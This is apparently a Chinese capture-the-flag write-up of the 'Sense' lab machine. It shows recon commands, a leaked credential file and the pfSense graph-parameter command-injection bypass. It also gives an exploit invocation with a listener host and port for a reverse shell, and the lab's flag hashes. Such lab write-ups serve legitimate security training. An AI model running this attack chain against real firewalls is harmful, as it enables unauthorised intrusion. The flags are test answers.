[Meachines] [Easy] Sense PFSense防火墙RCE

server/2024/12/21 3:26:09/

信息收集

IP AddressOpening Ports
10.10.10.60TCP:80,443

$ nmap -p- 10.10.10.60 --min-rate 1000 -sC -sV

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
|_http-server-header: lighttpd/1.4.35

HTTPS

https://10.10.10.60/

image.png

$ gobuster dir -u "https://10.10.10.60/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50 -k

$ curl "https://10.10.10.60/system-users.txt" -k

image-2.png

username:rohit password:pfsense

image-1.png

PFSense防火墙-RCE

image-4.png

$ searchsploit -w PFSense 2.1.3

image-5.png

pfSense的status_rrd_graph_img.php页面在处理graph参数时存在命令注入漏洞。尽管对graph参数进行了正则表达式过滤,但管道字符(|)未被移除。通过使用八进制编码,可以绕过非法字符的过滤,注入并执行任意操作系统命令。

$ python3 exp.py --rhost 10.10.10.60 --lhost 10.10.16.14 --lport 10032 --username rohit --password pfsense

image-6.png

User.txt

8721327cc232073b40d27d9c17e7348b

Root.txt

d08c32a5d4f8c8b10e76eb51a69f1a86


http://www.ppmy.cn/server/95752.html

相关文章

数据结构之《二叉树》(上)

数据结构之《二叉树》(上)

在之前的数据结构的学习中,我们了解了顺序表、链表等线性表,接下来在本篇中将要学习一种非线性的数据结构——树,我们将来了解树的相关概念和性质,在树当中将重点学习二叉树的结构和特性。学习完相关概念后将试着实现二叉树&#…
阅读更多...
使用Python实现深度学习模型:智能航空与无人机技术

使用Python实现深度学习模型:智能航空与无人机技术

介绍 在现代航空与无人机技术中,深度学习可以帮助进行飞行路径规划、目标检测、避障等。本文将介绍如何使用Python和深度学习库TensorFlow与Keras来构建一个简单的无人机目标检测模型。 环境准备 首先,我们需要安装必要的Python库: pip install tensorflow pandas numpy…
阅读更多...
基本类型和引用类型的参数传递

基本类型和引用类型的参数传递

Java 只有按值传递,不论是基本类型还是引用类型。 基本类型是值传递很好理解,引用类型有些同学可能有点理解不了,特别是初学者。 JVM 内存有划分为栈和堆,局部变量和方法参数是在栈上分配的,引用类型占4个字节,基本类型看具体类型,例如 long 和 double 占8个字节。而对象所占的…
阅读更多...
GD 32 产品配置参数存储方案

GD 32 产品配置参数存储方案

前言: ......... 产品配置参数存储方案 在实际项目开发过程中,常常会涉及到一些参数的掉电存储,这些参数占用存储空间不大,但需要具备。 可读可写的能力,而且这些参数往往扮演着重要的角色,比如Modbus地址…
阅读更多...
python爬虫预备知识三-序列化和反序列化

python爬虫预备知识三-序列化和反序列化

序列化和反序列化 序列化是为了将内存中的数据保存在磁盘上或者用于传输,实现程序状态的保存和共享。反序列化反之。 序列化后的变量再被反序列化回来之后,两者之间已经没有任何关系。 序列化后的文件是在不同程序或者说不同语言之间传递数据的关键方…
阅读更多...
2024第五届华数杯数学建模竞赛C题思路+代码

2024第五届华数杯数学建模竞赛C题思路+代码

目录 原题背景背景分析 问题一原题思路Step1:数据读取与处理Step2:计算最高评分(Best Score, BS)Step3:统计各城市的最高评分(BS)景点数量 程序读取数据数据预处理 问题二原题思路Step1: 定义评价指标Step2: 收集数据Step3: 标准化…
阅读更多...
python pip怎么安装包

python pip怎么安装包

按WinR键打开运行窗口,输入“cmd”,再按回车键,打开命令行窗口。 找到pip安装路径。 Python2/Python3安装路径是相同的,都在x:\Python xx\Scripts路径下。 拖动pip主应用程序到命令行窗口。 输入“install 模块/包名”&#xff…
阅读更多...
Postman 接口测试详解

Postman 接口测试详解

Postman 接口测试详解 Postman 接口测试详解1. Postman 基础知识1.1 什么是 Postman?1.2 Postman 的主要功能 2. 安装与设置2.1 安装 Postman2.2 创建 Postman 账户 3. Postman 的基本操作3.1 创建和发送请求3.2 解析响应数据3.3 使用环境和变量 4. 进阶功能4.1 编写…
阅读更多...
最新文章

Copyright @ 2022~2023